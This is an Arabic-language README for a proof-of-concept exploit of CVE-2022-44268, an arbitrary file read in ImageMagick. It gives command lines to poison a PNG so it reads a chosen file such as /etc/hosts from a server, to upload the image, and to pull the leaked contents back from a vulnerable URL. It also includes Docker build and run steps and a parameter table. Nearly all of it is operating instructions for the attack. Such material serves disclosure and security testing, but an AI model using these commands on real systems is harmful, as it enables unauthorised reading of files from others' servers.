
CVE-2022-44268 ImageMagick قراءة ملف عشوائي - استغلال لإثبات المفهوم
CVE-2022-44268 قراءة ملف عشوائي في ImageMagick - استغلال إثبات المفهوم
تسميم الصورة ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
رفع صورة PNG مسمومة.
التحقق من نجاح الاستغلال 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
البناء
docker build -t cve-2022-44268 .
التشغيل
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| المعلمة | الوصف | النوع |
|---|
| --url | رابط URL لصورة PNG المرفوعة | نص |
| --image | ملف PNG الإدخال | ملف |
| --output | ملف PNG الإخراج | ملف |
| --file-to-read | الملف المراد قراءته من المضيف الثغري | نص |